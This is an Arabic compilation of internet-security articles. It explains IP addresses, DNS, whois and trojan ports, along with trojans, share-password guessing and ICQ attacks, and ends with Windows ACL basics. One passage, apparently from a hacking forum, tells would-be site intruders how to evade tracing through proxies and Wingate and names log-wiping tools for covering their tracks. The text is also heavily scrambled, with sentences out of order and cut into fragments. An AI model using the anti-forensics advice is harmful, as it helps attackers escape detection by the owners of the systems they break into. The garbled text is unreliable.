لذكرها‪.‬فالذاكرة البشرية غير قادرة على حفظ الكثير من الرقام ومن هنا‬ ‫تم التوجه للـ ‪ DNS‬وهو عبارة عن جهاز خادم يحفظ معلومات هي عبارة عن أسماء الجهزة وأرقام ‪IP‬‬ ‫الخاصة بها حيث يقوم المستخدمون بإرسال اسم الموقع الى مزود ‪ DNS‬ليرد عليهم بعنوانه )رقم ‪IP‬‬ ‫الخاص به( فلتدخل على موقع ‪ www.53.‬في نظام الشبكات يسمى‬ ‫هذا التخاطب بالتصال ‪ .‬‬ ‫فمثل لزيارة موقع ‪ CNN‬يجب أن تكتب ‪ 207.‬من هذا المبدأ جاءت فكرة‬ ‫‪ .com‬ومن ثم لحظ‬ ‫خبراء الحاسب أن ذلك سيكون صعبا جدا ‪ .com‬يكفي ان تكتبها في المستعرض الذي سيقوم بإرسالها‬ ‫لخادم السماء ‪ DNS‬والذي سيقوم بتحويلها الى عنوان الجهازحتى يستطيع جهازك التخاطب مع خادم‬ ‫الويب الخاص بشبكة سي ان ان‪ .DNS‬حيث أنه في بداية استخدام النترنت كان من المفروض أن تحفظ عنوان الجهاز ‪ IP‬لكل موقع ‪.‬‬ ‫هناك استثناءان لهذا‬ ‫النظام‪ ،‬حيث يمكن لي‬ ‫شخص آخر في نظام‬ ‫المحادثة معرفة رقم ‪IP‬‬ ‫الكامل الخاص بك‪ .

com‬وستحصل على اسم الشخص الذي قام بتسجيل الموقع وعنوانه البريدي‬ ‫ورقم هاتفه والفاكس وغيرها من المعلومات الخرى المتعلقة بالموقع‪ .‬‬ ‫‪ .‬‬ ‫مما ذكر أعله‪ ،‬احذر من الدخول للغرف التي تكون مخصصة للهاكرز‪ ،‬حيث أنه المشرف )وهو هاكر في‬ ‫الغالب( سيحصل على رقم ‪ IP‬الخاص بك مباشرة مما يعرض جهازك لخطر الختراق‪ .‫دخلت بها )المشرف هو الشخص الذي أنشأ الغرفة أو الشخص الذي تم منحه الصلحية من قبل من أنشأ‬ ‫الغرفة(‪ ،‬حيث أن المشرف يحصل على رقم الـ ‪ IP‬الكامل لكل شخص دخل غرفته‪.‬‬ ‫من صاحب الموقع ؟‬ ‫لبد أنك قد زرت موقعا وأعجبك‪ ،‬وتساءلت في نفسك من هو صاحب هذا الموقع )سواء كان شخصا أو‬ ‫مؤسسة( ل داعي لن تحتار بعد الن فيكفي أن تذهب للموقع‬ ‫‪ /www.1503‬‬ ‫التطبيق المقابل‬ ‫‪FTP 21‬‬ ‫ارسال بريد الكتروني‬ ‫‪SMTP‬‬ ‫‪11‬‬ ‫التطبيق المقابل‬ ‫تروجان ‪BackOrifice‬‬ ‫برنامج ‪Netmeeting‬‬ .‬وأيضا احذر من‬ ‫استقبال الملفات ممن ل تعرفهم أو ممن يعرض عليك إرسال الملفات بدون سبب‪ ،‬لن غرضه الوحيد ربما‬ ‫يكون الحصول على رقم الي بي الخاص بك‪.com/cgi-bin/whois/whois‬وتقوم بإدخال اسم الموقع من دون‬ ‫‪ ) www‬مثل ‪( wagait.‬بالطبع فهذه المعلومات قد قام صاحب‬ ‫الموقع بإدخالها عندما قام بحجز اسم الموقع‪.‬‬ ‫قائمة ببعض المنافذ والتطبيقات المقابلة لها‬ ‫المنفذ‬ ‫‪25‬‬ ‫المنفذ‬ ‫‪31337‬‬ ‫‪1720.2‬في حالة تبادلك الملفات مع شخص في نظام المحادثة‪ :‬فمزود المحادثة يقوم بدور الوسيط في نقل‬ ‫النصوص فقط‪ ،‬أما في حالة نقل الملفات فإنه يقوم بإعطاء كل الجهازين رقم الـ ‪ IP‬الخاص بالجهاز الخر‬ ‫بحيث يقومان بنقل البيانات بينهما بشكل مباشر‪.networksolutions.

20034‬تروجان ‪NetBus‬‬ ‫ويب ‪Web‬‬ ‫استقبال بريد الكتروني‬ ‫‪POP3‬‬ ‫مشاركة ملفات في‬ ‫ويندوز‬ ‫انتهى‪،،،‬‬ ‫‪12‬‬ .‫‪80‬‬ ‫‪110‬‬ ‫‪139‬‬ ‫المحادثة ‪Chat‬‬ ‫‪6667‬‬ ‫‪ 12345.

‬‬ ‫‪ -1‬الفيروسات )‪:(Viruses‬‬ ‫عندما يتم التحدث عن الخطار الموجودة في الحاسب اللي‪ ،‬تتوجه أذهان المستمعين تلقائيا للتفكير في‬ ‫الفيروسات‪ ،‬نظرا لنتشارها وقوة تأثيرها التخريبية على أجهزة الحاسب اللي‪ .‬كذلك هو الحال بالنسبة للحاسب اللي‪ ،‬فلكي تعرف كيف تحمي نفسك من شرور الهاكرز‪،‬‬ ‫يجب أن تعرف كيف يقومون باختراق جهازك‪ ،‬وما هي البواب التي يدخلون منها إلى أجهزتنا‪.‬ولعله من المناسب عدم‬ ‫الطالة في الحديث عن الفيروسات‪ ،‬فالغالبية )إن لم يكن الكل( يعرفون خطرها وتأثيرها على أجهزة‬ ‫المستخدمين‪.‬‬ ‫لعل من أشهر التروجان المنتشرة في النترنت التروجان المسماة بـ "نت باس" ‪ NetBus‬و" باك اوريفيس‬ ‫" ‪ Back Orifice‬و "سب سيفين " ‪ .‬وقد‬ ‫انتشرت هذه النوعية بكثرة في النترنت‪ ،‬نظرا لسهولة انخداع المستخدم بها ونظرا لما تعطيه للمخترقين من‬ ‫إمكانيات تصل في بعض الحيان إلى التحكم شبه الكامل في جهاز المستخدم الضحية‪.‬‬ ‫‪13‬‬ .‬‬ ‫‪ -2‬التروجان )‪:(Trojans‬‬ ‫التروجان أو أحصنة طروادة هي البرامج التي يكون في ظاهرها أنها تقوم بأداء وظيفة مفيدة للمستخدم‬ ‫ولكنها في الحقيقة وخلف الكواليس تقوم بعمل وظيفة أخرى )غالبا مخربة( بدون علم المستخدم‪ .‬بالطبع فإننا سنلمح لهذه البرامج تلميحا‪ ،‬ولن نذكر أسماءها وذلك حتى ل يتم إساءة‬ ‫استغللها‪. SubSeven‬وطريقة عملها متشابهة وهي أن يقوم المخترق‬ ‫بإخفاء التروجان في أحد الملفات والتي يقوم المستخدمون الخرون بسحبها ظنا منهم بأن هذه الملفات تقوم‬ ‫بوظائف مفيدة لهم‪ ،‬وعندما يقوم المستخدم بتنفيذ هذا الملف فإنه يقوم وبدون علمه بتركيب خادم للتروجان‬ ‫داخل جهازه بحيث يتمكن المخترق )باستخدام برنامج عميل للتروجان ‪ (client‬من التحكم في جهاز‬ ‫المستخدم الضحية‪.‫"مفاهيم خاصة بشبكات النترنت )الجزء الثاني("‬ ‫لكي تعرف كيف تحمي نفسك من أي خطر يجب أول أن تعرف ما هو هذا الخطر ومن ثم يصبح بإمكانك أن‬ ‫تعرف كيف تحمي نفسك من هذا الخطر‪ ،‬فمثل لكي نحمي أنفسنا من اللصوص‪ ،‬يجب أن نعرف خطرهم‪ .‬‬ ‫في الحلقة السابقة تكلمنا عن بعض مصطلحات ومفاهيم الشبكات‪ ،‬والتي تساعدك على معرفة ما سنتحدث‬ ‫عنه في هذه الحلقة وهي الطرق والبرامج التي تمكن المخترقين )الهاكرز( من القيام بعملية الختراق لجهزة‬ ‫المستخدمين لشبكة النترنت‪ ،‬سواء كان هذا الختراق لغرض التجسس وسرقة الملفات أو لغرض التخريب‬ ‫ومسح الملفات‪ .‬ومن‬ ‫ثم يجب أن نعرف كيف نتقي شرهم‪ ،‬فنحن نقفل البواب لمعرفتنا أن اللصوص قد يدخلون منها في حال‬ ‫تركناها مفتوحة‪ .‬‬ ‫تتشابه هذه التروجان في الوظائف التي تمكن المخترق من القيام بها‪ ،‬وتتراوح خطورة الوظائف من‬ ‫التجسس على الجهاز ) مثل سرقة الملفات والبريد اللكتروني وكلمات السر المختلفة( حتى العبث بجهاز‬ ‫المستخدم بإخراج القراص المضغوطة )‪ (CD-ROM‬أو إظهار رسالة مضحكة للمستخدم أو تشغيل ملف‬ ‫صوت وغيرها من الوظائف الخرى المزعجة‪.

‬طبعا قد تتساءل "كيف‬ ‫يستطيع الخرون الوصول لي ؟ وأنا جهاز ضمن المليين من الجهزة على النترنت" يؤسفني أن أقول لك‬ ‫أنه يتوافر الكثير من البرامج )وكما قلنا فلن نذكر أسماءها حتى ل يساء استخدامها ( والتي تمكن للشخص‬ ‫من البحث عن المجلدات الموضوعة للمشاركة في أجهزة المستخدمين‪ .‫صورة تبين واجهة برنامج نت باس ويظهر فيها الوظائف المختلفة التي يمكن للهاكر القيام بها‬ ‫‪ -3‬المشاركة في الطباعة والملفات في ويندوز‪:‬‬ ‫من المعروف أن نظام ويندوز يسمح للمستخدم بتحديد أحد المجلدات أو القراص الصلبة في جهازه للمشاركة‬ ‫من قبل أشخاص آخرين على الشبكة‪ .‬وما يزيد الطين بلة أن بعض المستخدمين يقومون‬ ‫بمشاركة القرص الصلب بكامله !! وبعضهم يستخدم كلمة سر بسيطة من حرف أو حرفين !! مما يسهل‬ ‫المهمة على الهاكر ويجعله يحتار في أي الملفات يسرق وأيها يترك !!‬ ‫‪14‬‬ .‬بالطبع فإن هذه الخاصية مفيدة جدا ولها تطبيقات كثيرة نافعة‬ ‫للمستخدم‪ ،‬ولكن عندما تكون متصل بالنترنت فإن كل من يرى جهازك سيستطيع أن يرى هذه المجلدات التي‬ ‫وضعتها للمشاركة ويبقى العائق الوحيد للدخول عليها هو الحصول على كلمة السر‪ .‬وبعد الحصول على قائمة بهذه‬ ‫الجهزة فإنه ما على المخترق إل أن يقوم بتشغيل برنامج يقوم بمحاولة "تخمين" كلمة السر )ويوجد أيضا‬ ‫الكثير من البرامج من هذا النوع( والتي تقوم بتجريب آلف الكلمات والتي تم تخزينها مسبقا في ملف حتى‬ ‫تصل إلى كلمة السر الخاصة بالمجلد الموضوع للمشاركة‪ .

‬لذا يجب عليك الحذر عند زيارة المواقع التي يشتبه في كون أصحابها من المخترقين‬ ‫نظرا لقدرة أصحاب المواقع على وضع بريمجات في مواقعهم لستغلل الثغرات المنية في متصفحك والدخول‬ ‫‪15‬‬ .‬‬ ‫‪ -5‬برامج وتطبيقات النترنت‬ ‫إن تطبيقات النترنت ليست مجرد متصفحات فحسب ! بل إن هناك العديد من التطبيقات والبرامج الخرى التي‬ ‫يتم استخدامها في النترنت‪ .‬هذه الثغرات قد تمكن المخترق من الحصول على بعض الملفات والمعلومات‬ ‫الشخصية من جهازك‪ .‬بالطبع فإن نظام‬ ‫ويندوز ‪ 98‬يحتوي على تشفير أقوى من الذي كان موجودا في نظام ويندوز ‪ ، 95‬ولكنها مسألة وقت حتى‬ ‫يقوم الهاكرز بإيجاد برنامج يقوم بكسر هذا التشفير‪.‬ولكنه أيضا من أكثر البرامج شعبية للهاكرز‬ ‫نظرا لما يقدمه من إمكانيات للتخريب والعبث بأجهزة ضحاياهم‪ .‬فحين‬ ‫حصول الهاكر على هذا الملف )والذي ينتهي بالمتداد ‪ ( PWL‬فإن كلمة السر الخاصة بجهازك هي ملك له‬ ‫وذلك لوجود العديد من البرامج التي تقوم بفك تشفير هذا الملف والحصول على كلمة السر‪ .‫أحد البرامج التي تقوم بالبحث عن المجلدات الموضوعة المشاركة‬ ‫‪ -4‬سرقة كلمة السر المخزنة‪:‬‬ ‫يقوم نظام ويندوز بتخزين كلمة السر في ملف وذلك لكي يسترجعها بسرعة في حالة الحاجة إليها‪ ،‬بالطبع‬ ‫فإن كلمة السر يتم تخزينها بشكل مشفر)‪ ، ( encrypted‬ولكن ل شيء يستعصي على الهاكرز‪ .‬ولكن هذه البرامج قد تحتوي على العديد من الثغرات المنية التي تكون الباب‬ ‫المشرع الذي يستخدمه الهاكر للدخول في جهازك و إيذائك ! ومن هذه البرامج برنامج ‪ ICQ‬الشهير الذي‬ ‫يستخدمه المليين من المستخدمين في النترنت‪ .‬وهو يعتبر من أكثر البرامج شعبية بين مستخدمي النترنت‬ ‫نظرا لما يقدمه من خدمات تسهل التواصل بين المستخدمين‪ .‬فيوجد في النترنت العديد من البرامج التي‬ ‫تقوم بمهاجمة المستخدمين لهذا البرنامج‪ ،‬ويختلف تأثير هذه البرامج من الحصول على رقم ‪ IP‬الخاص‬ ‫بالمستخدم إلى القيام بإرسال كمية هائلة من البيانات لديه حتى يتوقف الجهاز عن الستجابة للمستخدم مما‬ ‫يضطره للقيام بعملية إعادة للتشغيل!‬ ‫‪ -6 -6‬المواقع المشبوهة‪:‬‬ ‫من فترة لخرى يتم اكتشاف الكثير من الثغرات المنية في المتصفحات ويتم استغلل هذه الثغرات بشكل كبير‬ ‫من قبل أصحاب مواقع الهاكرز‪ .

‬‬ ‫في العدد القادم بإذن ال سنقوم بالتحدث عن الطرق والبرامج الدفاعية التي يجب على المستخدم استخدامها‬ ‫لتقاء الهاكرز و شرورهم‪.‬وأبسط المثلة على ذلك ما يقوم به بعض المخربون من وضع بريمج )‪ (script‬يقوم بتكرار‬ ‫تشغيل برنامج المتصفح وفتح نوافذ جديدة حتى تنتهي موارد النظام ويصبح ل يستجيب للمستخدم مما‬ ‫يضطره لعادة تشغيل الجهاز ! بالطبع فإن هذه الثغرة تم تلفيها في متصفح إنترنت اكسبلورر ‪ 4‬وما فوق‬ ‫ولكنها تعطي مثال بسيطا للتخريب الذي ممكن أن يقوم به المخترقون‪.‬‬ ‫‪ -7‬الخدمات الضافية‪:‬‬ ‫يشتمل نظام التشغيل على بعض الخدمات الضافية التي قد ل يحتاجها المستخدم والتي قد تكون المدخل إلى‬ ‫جهازك‪ ،‬فمثل بعض الصدارات من نظام ويندوز تحتوي على خادم ويب وخادم ‪ FTP‬وخادم بريد إلكتروني )‬ ‫‪ (SMTP‬وهي ل تستخدم من قبل غالب المستخدمين ولكنها تحتوي في أغلب الحيان على ثغرات أمنية‬ ‫تمكن المخترقين من العبث بجهازك‪ .‬ويتم دائما إصدار تعديلت لهذه المشاكل المنية ولكن أغلب المستخدمين‬ ‫ل يقومون بتركيبها‪ .‬لذا فمن المستحسن أثناء تركيب نظام التشغيل أن يقوم المستخدم بإلغاء تركيب هذه‬ ‫الخدمات عندما ل يكون محتاجا لها وفي حالة كان المستخدم محتاجا لها‪ ،‬فمن المستحسن إيقاف تشغيلها عن‬ ‫اتصاله بالنترنت حتى ل يكون المنفذ الذي تعمل عليه هذه البرامج مفتوحا مما يسد الطريق على المخترقين‬ ‫الذي يريدون استغلل هذه الخدمات للدخول في جهازك‪.‬‬ ‫بالطبع فإن ما ذكرناه في هذا المقال ل يشمل جميع الطرق التي يستخدمها الهاكرز ‪ ،‬ولكنه كاف لعطاء فكرة‬ ‫عن هذه الطرق ورفع درجة الحذر لدى المستخدمين عن اتصالهم بالنترنت‪ ،‬مما يسهم في التقليل من‬ ‫احتمالية تعرضهم للختراق‪.‬‬ ‫انتهى‪،،،‬‬ ‫"المن عبر النترنت"‬ ‫‪16‬‬ .‫إلى جهازك‪ .

.. it reboots .‬هذا يعني‬ ‫انه تم اختراقك!!‬ ‫ده عشان لما بتعمل ‪ log in‬باوامر ‪ ftp‬بسيطه زي‪ .‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪<JawaDal :‬‬ ‫>ةةةةةةة‪:‬‬ ‫‪<z3r0‬‬ ‫هناك الكثير الذي يجب ان تعرفوه قبل ان تفكروا في تعلم اختراق المواقع و السيرفرات‬ ‫حسناا ‪here we G0‬‬ ‫الكثير من الناس يعملوا هاكينج من غير ما يعرفوا‪ ..‬نفس الكلم لو بتستخدم اكثر من بروكسي‬ ‫جهازك‪<--‬خادم البروكسي الول‪<--‬خادم البروكسي الثاني‪<--‬الثالث‪..files‬سوف يوقع بك)‪track you‬‬ ‫‪. (down‬‬ ‫ربما تقول‪ :‬مفيش مشكله انا هاستخدم بروكسي! بس ادي حلجه لزم تعرفها عن البروكسيهات‬ ‫جهازك‪<--‬خادم البروكسي‪<--‬الموقع‪--FTP--‬تلنت او اي شئ اخر!‬ ‫لو اخترقت موقع و الدمن عاوز يعرف انت مين‪...‬‬ ‫‪17‬‬ ...FILES) 1‬‬ ‫ايه بقى ال ‪ LOG‬ده؟‍؟‬ ‫ال ‪ log files‬ديه بتسجل كل شئ عن كل شخص اتصل بالجهاز)‪ (loged in‬و يحصلوا على معلومات‬ ‫مثل‪:‬‬ ‫يرون متى عملت الهاكينج بالضبط‬ ‫من اي موقع اتيت‬ ‫فضلت اد ايه ‪online‬‬ ‫ال ‪ IP Address‬بتاعك >>>>>>>‬ ‫ال ‪) host name‬اسم الجهاز(‬ ‫القاره‬ ‫الدوله‬ ‫المدينه‬ ‫المتصفح‬ ‫نظام التشغيل‬ ‫ال ‪screen resolution‬‬ ‫الوان الشاشه‬ ‫مزود الخدمه الخاص بك)‪>>>>(ISP‬‬ ‫هناك ‪ 3‬انواع ‪ log files‬مهمه‪:‬‬ ‫‪ .shell account‬يكتبوا شويه‬ ‫اوامر و بووم‪...(LOG...21‬بتدوس عليه و تتصل بالموقع‪.LASLOG‬من اي جاء الدخول\خروج‬ ‫و الكثير الكثير!! لذا لو الدمن اراد ان يلقي نظره عليهم )‪ (log..--so on--‬‬ ‫يقدر يجيبك بس هيحتاج فلوس كثير و وقت اكثر!!لكن في النهايه يقدر‪.WTMP‬يسجل كل دخول\خروج‪ ،‬مع ميعاد الدخول\الخروج بالضافه الى ال ‪ host‬و ‪tty‬‬ ‫‪.‬لو معاه شويه فلوس هيعرف!او حتي يخترق البروكسي‬ ‫سيرفر و هيجيبك ‪ .cd lcd dir ls :‬و اي حاجه تانيه‬ ‫لن مجرد ماتعمل ‪ log in‬في حاجه اسمها ‪LOGS..‬و نفس الشيئ عن طريق التلنت‪.‬لقد تم اختراقك!!!‬ ‫حتى لما تستخدم امر بسيط مثل‪ /FTP ftp://hostname:‬في الدوس عندك و تدوس انتر‬ ‫او عندك ‪ GFI LANguard network security scanner‬و عملت سكان على سايت و لقيت كذا‬ ‫بورت مفتوح و منهم بورت ‪ .UTMP‬من ‪ Onlne‬في هذه اللحظه‬ ‫‪.‬بيفتحوا ال ‪ dos‬او ‪ .‬ديه مش ثغره!‪ ..‬‬ ‫لكن تقدر ايضا تستخدم شيئ اسمه‪-: Wingate .

c invisible.‫‪ Wingate‬هو بروكسي يسمح بمشاركه كونكشن انترنت واحد او اكثر‪ .‬‬ ‫انتهى‪،،،‬‬ ‫"أمن الشبكات"‬ ‫‪18‬‬ ...‬فائده ال ‪ Wingate‬انه سيخفي‬ ‫ال ‪ IP‬عن الكمبيوتر الذي ستتصل به!!‬ ‫لكن للسف هذا كل ما اعرفه عنه‪ 1.‬لذا ارجو يا اخي ان تبحث في هذا المجال اول ثم بعدها تتعلم الختراق‪...c cloak2.‬هذه الجابه يجب ان يعرفها الجميع قبل ان يتعلم‬ ‫الهاكينج‬ ‫‪-1‬كيف تستخدم ال ‪ wingate‬؟ و اين نجده؟‬ ‫كيف نمسح اللوقز؟ و كيف نجدهم؟ و كيف نتأكد ان كل شئ على ما يرام؟!و كيف نتأكد اننا لم نترك اي اثار‬ ‫‪ tracks‬خلفنا؟‬ ‫ها هو برنامج اعرفه‪ :‬و اسمه ‪log modifier‬‬ ‫‪ah-1_0b.‬و انا متأكد انك ستجد الكثير ‪.web‬و كيف تؤمن‬ ‫جهازك؟!!‪..‬مثل ال ‪ .‬نحتاج بعض الشخاص الذكياء ليعلمونا كيف نستخدمه و اين نجده؟!‬ ‫ماذا ايضاا‪..‬لكن بالنهايه ليس المهم كم سؤال سألت ‪ .c wtmped.‬يجب ان يكون عندك لو كنت تريد‬ ‫اختراق موقع و تترك ايميلك فيه!‬ ‫تستطيع ان تحصل عليه من‪/http://www..‬و الملفات الشخصيه و اللوق( انا افعل‬ ‫هذه الشياء كل يوم قبل ان ادخل عالنت!! لدي برنامج رائع اسمه ‪ windows washer‬يجب ان يكون‬ ‫عندك‪ .‬لقد خصلت عليه من المدرسه‪ .c wzap. zone alarm‬امسح ملفات‬ ‫الهيستوري)كالكوكيز و النترنت هيستوري و ملفات النترنت المؤقته‪.‬و لست الوحيد الذي يحتاج الجابه ‪ ..‬اذهب لجوجل و اكتب ‪ how to Stay anonymous on the web‬او ‪how to‬‬ ‫‪secure to secure my computer‬‬ ‫او زور موقع امني جيد و ابحث عن شئ كهذا ‪ .‬اممممممــم‬ ‫اه تذكرت!!‪ .spyware‬استخدم ‪ firewall‬مثل ال ‪ ......‬يجب‬ ‫ان تجد الجابه هذا هو المهم‪ !!!.c‬‬ ‫==================================================‬ ‫==========================================‬ ‫هذا يا اخي كل ما عرفته في اخر اسبوعين‪ ...tar clear.c‬‬ ‫‪zap.‬‬ ‫و الكثير‪ .pgpi....‬سرقته هاهاها‪.‬‬ ‫و ل تنسى ال ‪ Preety Good Privacy (PGP)d‬انه مجاني ‪ ..c marryv11.‬و سألت سؤالين او اكثر عن كيفيه البقاء ‪anonymous‬‬ ‫عالنت و عن استخدام البروكسيز و بعض الناس جاوبوني‪ .‬قبل كل شئ يجب ان تعرف كيف تظل ‪ anonymous‬على ال ‪ ..org :‬‬ ‫‪ ok‬اظن ان هذا كل ما يمكنني كتابته لكن هناك الكثير لكن يجب ان تبحث عنه!‬ ‫ارجوا ان يعلمك هذا الدرس شيئا يا اخواني‬ ‫لكن لدي سؤال الن ‪ ..

ACL‬‬ ‫‪ -5‬شرح لعملية تفحص التراخيص‪.‬‬ ‫‪ -7‬إعطاء تصاريح ‪ Permissions‬للمستخدمين للوصول للبيانات و المعدات كل حسب طبيعة عمله و في‬ ‫هذه الحالة يجب مشاركة البيانات و المعدات للسماح للخرين باستخدامها‪.‬‬ ‫وهذا لفتقار هذا القسم لمواضيع مثل هذه ‪.(Security Agency (NSA‬‬ ‫‪ -5‬تزويد المستخدمين بأجهزة ل تحتوي على محركات أقراص مرنة أو مضغوطة أو حتى أقراص صلبة ‪ ،‬و‬ ‫تتصل هذه الجهزة بالمزودات باستخدام رقاقة إقلع ‪ ROM Boot Chip‬و عند تشغيل هذه الجهزة يقوم‬ ‫المزود بتحميل برنامج القلع في ذاكرة ‪ RAM‬للجهاز ليبدأ بالعمل‪.‬‬ ‫و هناك بعض الجراءات التي تساعد في المحافظة على أمن الشبكة‪:‬‬ ‫‪ -1‬التدريب المتقن للمستخدمين على التعامل مع إجراءات المن‪.‬‬ ‫‪ -2‬وصف لعلقة الولوج الى الشبكة بأمنها‪.‬‬ ‫‪ -4‬شرح لمكونات ‪.‬‬ ‫أي شبكة قد تكون عرضة للوصول غير المرخص لي مما يلي‪:‬‬ ‫‪ -1‬المعدات‪.‬‬ ‫‪19‬‬ .‬‬ ‫‪ -4‬الموارد‪.‬‬ ‫‪-------------------------------------------------------‬‬‫‪ -1‬عرض لبعض المخاطر المنية التي قد تتعرض لها الشبكة و كيفية الوقاية منها‪.‬‬ ‫‪ -3‬عمليات الشبكة‪.‬‬ ‫تعتمد درجة أمن الشبكة على مدى حساسية البيانات المتداولة عبر الشبكة‪.‬‬ ‫لذلك أرجو سماع وزاع ضميركم ‪.‬‬ ‫‪ -3‬البيانات‪.‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪:‬ةةةةةة<‬ ‫فى هذا الموضووع سأتناول بعض طرق الحماية نقل عن كتاب ‪.‬‬ ‫‪ -3‬حماية السلك النحاسية و إخفاءها عن العين لنها قد تكون عرضة للتجسس‪.‬‬ ‫‪ -3‬كيفية حماية الموارد بواسطة تراخيص الوصول‪.‬‬ ‫‪ -8‬تزويد المستخدمين بحقوق ‪ Rights‬تحدد النشطة و العمليات المسموح لهم إجراءها على النظام‪.‬‬ ‫‪ -4‬تشفير البيانات عند الحاجة أما مقاييس التشفير فتضعها وكالة المن الوطني المريكية ‪National‬‬ ‫‪.‬‬ ‫و يتم تنظيم المن وفقا لنوع الشبكة ‪ ،‬ففي شبكات الند للند كل جهاز يتحكم في أمنه الخاص ‪ ،‬بينما يتحكم‬ ‫المزود في أمن شبكات الزبون المزود‪.‬‬ ‫‪-6‬استخدام برامج لتسجيل جميع العمليات التي يتم إجراؤها على الشبكة لمراجعتها عند الضرورة‪.‬‬ ‫‪ -2‬التأكد من أمن المعدات و صعوبة الوصول اليها من قبل غير المخولين‪.

‬أنظر الصورة‪.‬‬ ‫عند إدخال السم و كلمة المرور يتم تمرير هذه المعلومات الى مدير أمن الحسابات ‪Security‬‬ ‫‪ (Accounts Manager (SAM‬فإذا كان الولوج الى جهاز ‪ Workstation‬فإن المعلومات يتم‬ ‫مقارنتها مع قاعدة بيانات حسابات المن المحلية في الجهاز‪ ،‬أما إذا كان الولوج الى نطاق ‪ Domain‬فإن‬ ‫المعلومات يتم إرسالها الى مزود ‪ SAM‬الذي يقارنها مع قاعدة بيانات حسابات النطاق‪ ،‬فإذا كان اسم‬ ‫المستخدم أو كلمة المرور غير صالحين فإن المستخدم يمنع من الدخول الى النظام‪ ،‬أما إذا كانا صحيحين فإن‬ ‫‪20‬‬ .‫هناك نظامان أساسيان لعطاء التصاريح و الحقوق ‪:‬‬ ‫‪ -1‬المشاركة المحمية بكلمة مرور‪.‬‬ ‫في النظام الول يتم تعيين كلمة سر لكل من الموارد المطلوب مشاركتها و يتم الوصول لهذه الموارد فقط من‬ ‫قبل من لديه كلمة السر‪.‬‬ ‫كما تستطيع تحديد درجة الوصول هل هي للقراءة فقط أم وصول كامل أم وفقا لكلمة السر‪.‬‬ ‫في النظام الثاني يتم تعيين الحقوق و إعطاء التصاريح لكل مستخدم أو مجموعة مستخدمين ‪ ،‬و يكفي أن‬ ‫يدخل المستخدم كلمة المرور عند الدخول الى نظام التشغيل ليتعرف النظام على حقوق هذا المستخدم و‬ ‫التصاريح المتوفرة له‪ ،‬و يعتبر هذا النظام أكثر أمنا من النظام السابق و يعطي مدير الشبكة تحكما أكبر بكل‬ ‫مستخدم‪.‬‬ ‫‪ -2‬تصاريح الوصول‪.

‬‬ ‫يمتلك كل مورد من الموارد قائمة تحكم بالوصول ‪ (Access Control List (ACL‬و كل معلومة يتم‬ ‫إدخالها في ‪ ACL‬يطلق عليها ‪.‬‬ ‫‪ -2‬معرفات المجموعة ‪ Group SIDs‬و هي التي تحدد المجموعة التي ينتمي لها المستخدم‪.‬‬ ‫‪ -3‬المتيازات ‪ Privileges‬و هي تمثل الحقوق الممنوحة لحسابك‪.‬‬ ‫كما أنه يتم إصدار ‪ Access Token‬عند محاولتك التصال من جهازك بجهاز آخر على شبكتك و يطلق‬ ‫على هذا الجراء الولوج عن بعد ‪.AccessAllowed‬‬ ‫‪ -2‬الوصول ممنوع ‪ AccessDenied‬و يتم إنشاؤها إذا كان تصريح الوصول هو ‪.‫نظام المن الفرعي يقوم بإصدار بطاقة ولوج ‪ Access Token‬تعرف النظام بالمستخدم فترة ولوجه و‬ ‫تحتوي هذه البطاقة على المعلومات التالية‪:‬‬ ‫‪ -1‬المعرف المني ‪ (Security Identifier (SID‬و هو رقم فريد خاص بكل حساب‪.‬‬ ‫في ويندوز ‪ NT‬و ويندوز ‪ 2000‬يتم ترتيب ‪ ACE‬بحيث تكون ‪ AccessDenied ACEs‬قبل‬ ‫‪ ، AccessAllowed ACEs‬فإذا وجد ‪ SID‬خاصتك في أي من ‪AccessDenied ACEs‬‬ ‫فستمنع من الوصول الى المورد و إل فسيبحث في ‪ AccessAllowed ACEs‬للتأكد من الحقوق‬ ‫الممنوحة لك فإن لم يعثر على ‪ SID‬مطابق لخاصتك فستعرض رسالة تحذير تمنعك من الوصول للمورد‪.‬‬ ‫‪ -3‬تصريح كتابة و يسمح بالتعديل في محتوى الملفات‪.‬‬ ‫ملخص الدرس‪:‬‬ ‫‪21‬‬ .‬‬ ‫‪ -4‬ممنوع الستخدام ‪.‬‬ ‫هناك نوعان ل ‪: ACE‬‬ ‫‪ -1‬الوصول مسموح ‪.‬‬ ‫‪ -2‬تصريح تنفيذ للتطبيقات‪.No Access‬‬ ‫و التصاريح ممكن منحها لمستخدم أو مجموعة من المستخدمين و هذا ٍأسهل‪.(Access Control Entry (ACE‬‬ ‫يتم إنشاء ‪ ACE‬عند منح التصريح لستخدام المورد و تحتوي على ‪ SID‬للمستخدم أو مجموعته الممنوحة‬ ‫التصريح بالضافة الى نوع التصريح‪ ،‬فلو افترضنا أن مدير مجموعة ما قد ُمنح تصريح قراءة و تصريح‬ ‫كتابة لملف ما فإن ‪ ACE‬جديد يتم إنشاؤه ثم إضافته الى ‪ ACL‬الخاص بالملف و سيحتوي ‪ ACE‬على‬ ‫‪ SID‬لمدير المجموعة بالضافة الى تصريح قراءة و تصريح كتابة‪.Remote Logon‬‬ ‫من المور التي يجب مراعاتها عند الحديث عن أمن الشبكة هو المحافظة على أمن الموارد مثل الطابعات و‬ ‫محركات القراص و الملفات و التي يقوم مدير الشبكة بتعيين تصاريح لستخدام هذه الموارد‪.‬‬ ‫و من التصاريح التي قد تعطى للوصول الى الملفات ما يلي‪:‬‬ ‫‪ -1‬تصريح قراءة و يسمح لك بعرض و نسخ الملفات‪.No Access‬‬ ‫و هكذا عندما يحاول مستخدم ما الوصول الى مورد ما يتم مقارنة ‪ SID‬الخاص به مع ‪ SIDs‬في كل ‪ACE‬‬ ‫من ‪ ACL‬للمورد‪.

‬‬ ‫انتهى‪،،،‬‬ ‫"مصطلحات مهمة للمبتدئين في اختراق المواقع"‬ ‫‪22‬‬ .‫هناك بعض الجراءات التي يجب اتخاذها للمحافظة على أمن الشبكة و منها‪:‬‬ ‫تدريب المستخدمين ‪ ،‬حماية المعدات ‪ ،‬تشفير البيانات ‪ ،‬استخدام أجهزة عديمة القراص ‪ ،‬مراقبة العمليات‬ ‫التي تجرى على الشبكة‪.‬‬ ‫‪ -2‬تصاريح الوصول‪.‬‬ ‫هناك نظامان أساسيان لعطاء التصاريح و الحقوق ‪:‬‬ ‫‪ -1‬المشاركة المحمية بكلمة مرور‪.

